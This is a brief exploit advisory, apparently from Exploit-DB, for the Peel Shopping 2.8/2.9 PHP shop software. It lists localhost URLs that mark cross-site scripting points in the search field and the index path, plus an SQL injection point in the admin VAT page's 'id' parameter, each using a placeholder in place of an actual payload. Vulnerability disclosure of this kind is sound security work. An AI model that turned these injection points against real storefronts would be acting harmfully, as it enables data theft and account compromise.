Peel Shopping 2.8/ 2.9 – Cross-Site Scripting / SQL Injections

  • 作者: Cyber-Crystal
    日期: 2012-01-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18422/
  • +-------------------------------------------------------------------------+
# Exploit Title : Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability
# version : v2.9
# Author: Cyber-Crystal 
# Date: n/a
# Software Link : http://www.peel.fr/ || or http://www.easy-script.com/scripts-PHP/peel-v29-4308.html
+-------------------------------------------------------------------------+


[+] Exploits

http://localhost/peel/index.php/achat/recherche.php?motclef=[Xss Here ]&action=Rechercher

http://localhost/peel/administrer/tva.php?mode=modif&id=[SQL]

http://localhost/peel/index.php/[XSS]





# The End //